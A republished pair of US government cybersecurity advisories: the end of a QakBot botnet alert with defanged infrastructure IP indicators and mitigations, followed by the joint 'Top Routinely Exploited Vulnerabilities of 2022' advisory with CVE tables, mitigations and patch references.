51.195.49[.]228	January 2023
188.127.243[.]148	January 2023
23.236.181[.]102	Unknown
45.84.224[.]23	Unknown
46.151.30[.]109	Unknown
94.103.85[.]86	Unknown
94.198.53[.]17	Unknown
95.211.95[.]14	Unknown
95.211.172[.]6	Unknown
95.211.172[.]7	Unknown
95.211.172[.]86	Unknown
95.211.172[.]108	Unknown
95.211.172[.]109	Unknown
95.211.198[.]177	Unknown
95.211.250[.]97	Unknown
95.211.250[.]98	Unknown
95.211.250[.]117	Unknown
185.81.114[.]188	Unknown
188.127.243[.]145	Unknown
188.127.243[.]147	Unknown
188.127.243[.]193	Unknown
188.241.58[.]140	Unknown
193.29.187[.]41	Unknown

Organizations are also encouraged to review the Qbot/QakBot Malware presentation from the U.S. Department of Health & Human Services Cybersecurity Program for additional information.

MITRE ATT&CK TECHNIQUES

For detailed associated software descriptions, tactics used, and groups that have been observed using this software, see MITRE ATT&CK’s page on QakBot.^[⁹^]

MITIGATIONS

Note: For situational awareness, the following SHA-256 hash is associated with FBI’s QakBot uninstaller: 7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117

CISA and FBI recommend network defenders apply the following mitigations to reduce the likelihood of QakBot-related activity and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other already-installed malware or ransomware on victim computers. Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Best Practice Mitigation Recommendations

Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud) [CPG 2.O, 2.R, 5.A].
Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards when developing and managing password policies [CPG 2.B]. This includes:
- Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;
- Store passwords in hashed format using industry-recognized password managers;
- Add password user “salts” to shared login credentials;
- Avoid reusing passwords;
- Implement multiple failed login attempt account lockouts;
- Disable password “hints”;
- Refrain from requiring password changes more frequently than once per year.
  Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
- Require administrator credentials to install software.
Use phishing-resistant multi-factor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services as possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins. For additional guidance on secure MFA configurations, visit cisa.gov/MFA and CISA’s Implementing Phishing-Resistant MFA Factsheet.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities of internet-facing systems [CPG 1.E]. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. Specifically, Cyber Hygiene services can help provide a second-set of eyes on organizations’ internet-accessible assets. Organizations can email vulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services” to get started.
Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks to restrict adversary lateral movement [CPG 2.F].
Identify, detect, and investigate abnormal activity and potential traversal of the indicated malware with a networking monitoring tool. To aid in detecting the malware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.D, 2.E].
Disable unused ports [CPG 2.V, 2.W, 2X].
Consider adding an email banner to emails received from outside your organization.
Disable hyperlinks in received emails.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task [CPG 2.E].
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Perform regular secure system backups and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.

Ransomware Guidance

CISA.gov/stopransomware is a whole-of-government resource that serves as one central location for ransomware resources and alerts.
CISA, FBI, the National Security Agency (NSA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) published an updated version of the #StopRansomware Guide, as ransomware actors have accelerated their tactics and techniques since its initial release in 2020.
CISA has released a new module in its Cyber Security Evaluation Tool (CSET), the Ransomware Readiness Assessment (RRA). CSET is a desktop software tool that guides network defenders through a step-by-step process to evaluate cybersecurity practices on their networks.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

Select an ATT&CK technique described in this advisory (see MITRE ATT&CK’s page on QakBot).^[⁹^]
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques.

REPORTING

FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with QakBot-affiliated actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report.

RESOURCES

REFERENCES

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.

VERSION HISTORY

August 30, 2023: Initial version.

Source de l’article sur us-cert.gov

29 August 2023/by Service comm.

2022 Top Routinely Exploited Vulnerabilities

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

SUMMARY

The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):

United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)
Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
Canada: Canadian Centre for Cyber Security (CCCS)
New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
United Kingdom: National Cyber Security Centre (NCSC-UK)

This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.

The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of compromise by malicious cyber actors.

Vendors, designers, and developers: Implement secure-by-design and -default principles and tactics to reduce the prevalence of vulnerabilities in your software.
- Follow the Secure Software Development Framework (SSDF), also known as SP 800-218, and implement secure design practices into each stage of the software development life cycle (SDLC). As part of this, establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.
- Prioritize secure-by-default configurations, such as eliminating default passwords, or requiring addition configuration changes to enhance product security.
- Ensure that published CVEs include the proper CWE field identifying the root cause of the vulnerability.
End-user organizations:
- Apply timely patches to systems. Note: First check for signs of compromise if CVEs identified in this CSA have not been patched.
- Implement a centralized patch management system.
- Use security tools, such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers.
- Ask your software providers to discuss their secure by design program and to provide links to information about how they are working to remove classes of vulnerabilities and to set secure default settings.

Download the PDF version of this report:

AA23-215A PDF (PDF, 980.90 KB )

TECHNICAL DETAILS

Key Findings

In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.

Malicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure—the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).

Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets’ networks. Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.

Top Routinely Exploited Vulnerabilities

Table 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:

CVE-2018-13379. This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
CVE-2021- 44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021- 44228 through the first half of 2022.
CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
CVE-2022-1388. This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
CVE-2022-30190. This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.

*Table 1: Top 12 Routinely Exploited Vulnerabilities in 2022*
CVE	Vendor	Product	Type	CWE
CVE-2018-13379	Fortinet	FortiOS and FortiProxy	SSL VPN credential exposure	CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-34473 (Proxy Shell)	Microsoft	Exchange Server	RCE	CWE-918 Server-Side Request Forgery (SSRF)
CVE-2021-31207 (Proxy Shell)	Microsoft	Exchange Server	Security Feature Bypass	CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-34523 (Proxy Shell)	Microsoft	Exchange Server	Elevation of Privilege	CWE-287 Improper Authentication
CVE-2021-40539	Zoho ManageEngine	ADSelfService Plus	RCE/ Authentication Bypass	CWE-287 Improper Authentication
CVE-2021-26084	Atlassian	Confluence Server and Data Center	Arbitrary code execution	CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
CVE-2021- 44228 (Log4Shell)	Apache	Log4j2	RCE	CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’) CWE-20 Improper Input Validation CWE-400 Uncontrolled Resource Consumption CWE-502 Deserialization of Untrusted Data
CVE-2022-22954	VMware	Workspace ONE Access and Identity Manager	RCE	CWE-94 Improper Control of Generation of Code (‘Code Injection’)
CVE-2022-22960	VMware	Workspace ONE Access, Identity Manager, and vRealize Automation	Improper Privilege Management	CWE-269 Improper Privilege Management
CVE-2022-1388	F5 Networks	BIG-IP	Missing Authentication Vulnerability	CWE-306 Missing Authentication for Critical Function
CVE-2022-30190	Microsoft	Multiple Products	RCE	None Listed
CVE-2022-26134	Atlassian	Confluence Server and Data Center	RCE	CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)

Additional Routinely Exploited Vulnerabilities

In addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities—listed in Table 2—that were also routinely exploited by malicious cyber actors in 2022.

*Table 2: Additional Routinely Exploited Vulnerabilities in 2022*
CVE	Vendor	Product	Type	CWE
CVE-2017-0199	Microsoft	Multiple Products	Arbitrary Code Execution	None Listed
CVE-2017-11882	Microsoft	Exchange Server	Arbitrary Code Execution	CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
CVE-2019-11510	Ivanti	Pulse Secure Pulse Connect Secure	Arbitrary File Reading	CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2019-0708	Microsoft	Remote Desktop Services	RCE	CWE-416: Use After Free
CVE-2019-19781	Citrix	Application Delivery Controller and Gateway	Arbitrary Code Execution	CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2020-5902	F5 Networks	BIG-IP	RCE	CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2020-1472	Microsoft	Multiple Products	Privilege Escalation	CWE-330: Use of Insufficiently Random Values
CVE-2020-14882	Oracle	WebLogic Server	RCE	None Listed
CVE-2020-14883	Oracle	WebLogic Server	RCE	None Listed
CVE-2021-20016	SonicWALL	SSLVPN SMA100	SQL Injection	CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
CVE-2021-26855 (ProxyLogon)	Microsoft	Exchange Server	RCE	CWE-918: Server-Side Request Forgery (SSRF)
CVE-2021-27065 (ProxyLogon)	Microsoft	Exchange Server	RCE	CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-26858 (ProxyLogon)	Microsoft	Exchange Server	RCE	None Listed
CVE-2021-26857 (ProxyLogon)	Microsoft	Exchange Server	RCE	CWE-502: Deserialization of Untrusted Data
CVE-2021-20021	SonicWALL	Email Security	Privilege Escalation Exploit Chain	CWE-269: Improper Privilege Management
CVE-2021-40438	Apache	HTTP Server	Server-Side Request Forgery	CWE-918: Server-Side Request Forgery (SSRF)
CVE-2021-41773	Apache	HTTP Server	Server Path Traversal	CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-42013	Apache	HTTP Server	Server Path Traversal	CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-20038	SonicWall	SMA 100 Series Appliances	Stack-based Buffer Overflow	CWE-787: Out-of-bounds Write CWE-121: Stack-based Buffer Overflow
CVE-2021-45046	Apache	Log4j	RCE	CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’)
CVE-2022-42475	Fortinet	FortiOS	Heap-based Buffer Overflow	CWE-787: Out-of-bounds Write
CVE-2022-24682	Zimbra	Collaboration Suite	‘Cross-site Scripting’	CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
CVE-2022-22536	SAP	Internet Communication Manager (ICM)	HTTP Request Smuggling	CWE-444: Inconsistent Interpretation of HTTP Requests (‘HTTP Request/Response Smuggling’)
CVE-2022-22963	VMware Tanzu	Spring Cloud	RCE	CWE-94: Improper Control of Generation of Code (‘Code Injection’) CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’)
CVE-2022-29464	WSO2	Multiple Products	RCE	CWE-434: Unrestricted Upload of File with Dangerous Type
CVE-2022-27924	Zimbra	Zimbra Collaboration Suite	Command Injection	CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
CVE-2022-22047	Microsoft	Windows CSRSS	Elevation of Privilege	CWE-269: Improper Privilege Management
CVE-2022-27593	QNAP	QNAP NAS	Externally Controlled Reference	CWE-610: Externally Controlled Reference to a Resource in Another Sphere
CVE-2022-41082	Microsoft	Exchange Server	Privilege Escalation	None Listed
CVE-2022-40684	Fortinet	FortiOS, FortiProxy, FortiSwitchManager	Authentication Bypass	CWE-306: Missing Authentication for Critical Function

MITIGATIONS

Vendors and Developers

The authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:

Identify repeatedly exploited classes of vulnerability. Perform an analysis of both CVEs and known exploited vulnerabilities to understand which classes of vulnerability are identified more than others. Implement appropriate mitigations to eliminate those classes of vulnerability. For example, if a product has several instances of SQL injection vulnerabilities, ensure all database queries in the product use parameterized queries, and prohibit other forms of queries.
Ensure business leaders are responsible for security. Business leaders should ensure that proactive steps to eliminate entire classes of security vulnerabilities, rather than only making one-off patches when new vulnerabilities are discovered.
Follow the SSDF (SP 800-218) and implement secure design practices into each stage of the SDLC. Pay attention to:
- Prioritizing the use of memory safe languages wherever possible [SSDF PW 6.1].
- Exercising due diligence when selecting software components (e.g., software libraries, modules, middleware, frameworks) to ensure robust security in consumer software products [SSDF PW 4.1].
- Setting up secure development team practices; this includes conducting peer code reviews, working to a common organization secure coding standard, and maintaining awareness of language specific security concerns [SSDF PW.5.1, PW.7.1, PW.7.2].
- Establishing a vulnerability disclosure program to verify and resolve security vulnerabilities disclosed by people who may be internal or external to the organization [SSDF RV.1.3]. As part of this, establish processes to determine root causes of discovered vulnerabilities.
- Using static and dynamic application security testing (SAST/DAST) tools to analyze product source code and application behavior to detect error-prone practices [SSDF PW.7.2, PW.8.2].
- Configuring production-ready products to have to most secure settings as default and providing guidance on the risks of changing each setting [SSDF PW.9.1, PW9.2]
Prioritize secure-by-default configurations such as eliminating default passwords, implementing single sign on (SSO) technology via modern open standards, and providing high-quality audit logs to customers with no additional configuration and at no extra charge.
Ensure published CVEs include the proper CWE field identifying the root cause of the vulnerability to enable industry-wide analysis of software security and design flaws.

For more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default.

End-User Organizations

The authoring agencies recommend end-user organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on CPGs, including additional recommended baseline protections.

Vulnerability and Configuration Management

Update software, operating systems, applications, and firmware on IT network assets in a timely manner [CPG 1.E]. Prioritize patching known exploited vulnerabilities, especially those CVEs identified in this CSA, then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix.
- If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.
- Replace end-of-life software (i.e., software no longer supported by the vendor).
Routinely perform automated asset discovery across the entire estate to identify and catalogue all the systems, services, hardware and software.
Implement a robust patch management process and centralized patch management system that establishes prioritization of patch applications [CPG 1.A].
- Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications—such as webmail, file storage, file sharing, and chat and other employee collaboration tools—for their customers. However, MSPs and CSPs can expand their customer’s attack surface and may introduce unanticipated risks, so organizations should proactively collaborate with their MSPs and CSPs to jointly reduce risk [CPG 1.F]. For more information and guidance, see the following resources.
  - CISA Insights Risk Considerations for Managed Service Provider Customers
  - CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses
  - ACSC advice on How to Manage Your Security When Engaging a Managed Service Provider
Document secure baseline configurations for all IT/OT components, including cloud infrastructure. Monitor, examine, and document any deviations from the initial secure baseline [CPG 2.O].
Perform regular secure system backups and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].
Maintain an updated cybersecurity incident response plan that is tested at least annually and updated within a risk informed time frame to ensure its effectiveness [CPG 2.S].

Identity and Access Management

Enforce phishing-resistant multifactor authentication (MFA) for all users, without exception. [CPG 2.H].
Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords [CPG 2.A, 2.B, 2.C, 2.D, 2.G].
Regularly review, validate, or remove privileged accounts (annually at a minimum) [CPG 2.D, 2.E].
Configure access control under the principle of least privilege [CPG 2.Q].
- Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (using non-administrative privileges where feasible).
  Note: See CISA’s Capacity Enhancement Guide – Implementing Strong Authentication and ACSC’s guidance on Implementing Multi-Factor Authentication for more information on authentication system hardening.

Protective Controls and Architecture

Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices [CPG 2.V, 2.W, 2X].
- Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.
- Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.
- Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).

Implement Zero Trust Network Architecture (ZTNA) to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks [CPG 2.F, 2.X]. Note: See the Department of Defense’s Zero Trust Reference Architecture for additional information on Zero Trust.
Continuously monitor the attack surface and investigate abnormal activity that may indicate cyber actor or malware lateral movement [CPG 2.T].
- Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure EDR, SIEM, vulnerability scanner, and other similar tools are reporting the same number of assets [CPG 2.T, 2.V].
- Use web application firewalls to monitor and filter web traffic. These tools are commercially available via hardware, software, and cloud-based solutions, and may detect and mitigate exploitation attempts where a cyber actor sends a malicious web request to an unpatched device [CPG 2.B, 2.F].
- Implement an administrative policy and/or automated process configured to monitor unwanted hardware, software, or programs against an allowlist with specified approved versions [CPG 2.Q].
- Use a network protocol analyzer to examine captured data, including packet-level data.

Supply Chain Security

Reduce third-party applications and unique system/application builds—provide exceptions only if required to support business critical functions [CPG 2.Q].
Ensure contracts require vendors and/or third-party service providers to:
- Provide notification of security incidents and vulnerabilities within a risk informed time frame [CPG 1.G, 1.H, 1.I].
- Supply a Software Bill of Materials (SBOM) with all products to enhance vulnerability monitoring and to help reduce time to respond to identified vulnerabilities [CPG 4.B].
Ask your software providers to discuss their secure by design program and to provide links to information about how they are working to remove classes of vulnerabilities, and to set secure default settings.

RESOURCES

For information on the top vulnerabilities routinely exploited in 2016 through 2019, 2020, and 2021, see:
- Joint CSA Top 10 Routinely Exploited Vulnerabilities
- Joint CSA Top Routinely Exploited Vulnerabilities
- Joint CSA 2021 Top Routinely Exploited Vulnerabilities
See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.
See ACSC’s Essential Eight mitigation strategies for additional mitigations.
See ACSC’s Cyber Supply Chain Risk Management for additional considerations and advice.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

PURPOSE

This document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

REFERENCES

[1] Apache Log4j Vulnerability Guidance

VERSION HISTORY

August 3, 2023: Initial version.

APPENDIX: PATCH INFORMATION AND ADDITIONAL RESOURCES FOR TOP EXPLOITED VULNERABILITIES

CVE	Vendor	Affected Products and Versions	Patch Information	Resources
CVE-2017-0199	Microsoft	Multiple Products	Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows
CVE-2017-11882	Microsoft	Office, Multiple Versions	Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882
CVE-2018-13379	Fortinet	FortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6	FortiProxy – system file leak through SSL VPN special crafted HTTP resource requests	Joint CSAs: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
CVE-2019-11510	Ivanti	Pulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12	SA44101 – 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX	CISA Alerts: Continued Exploitation of Pulse Secure VPN Vulnerability Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity ACSC Advisory: 2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software Joint CSA: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations CCCS Alert: APT Actors Target U.S. and Allied Networks – Update 1
CVE-2019-0708	Microsoft	Remote Desktop Services	Remote Desktop Services Remote Code Execution Vulnerability
CVE-2019-19781	Citrix	ADC and Gateway version 13.0 all supported builds before 13.0.47.24 NetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12 SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b	CVE-2019-19781 – Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance	Joint CSAs: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity CCCS Alert: Detecting Compromises relating to Citrix CVE-2019-19781
CVE-2020-5902	F5	BIG IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5	K52145254: TMUI RCE vulnerability CVE-2020-5902	CISA Alert: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902
CVE-2020-1472	Microsoft	Windows Server, Multiple Versions	Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472	ACSC Advisory: 2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) Joint CSA: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations CCCS Alert: Microsoft Netlogon Elevation of Privilege Vulnerability – CVE-2020-1472 – Update 1
CVE-2020-14882	Oracle	WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0	Oracle Critical Patch Update Advisory – October 2020
CVE-2020-14883	Oracle	WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0	Oracle Critical Patch Update Advisory – October 2020
CVE-2021-20016	SonicWALL	SSLVPN SMA100, Build Version 10.x	Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x
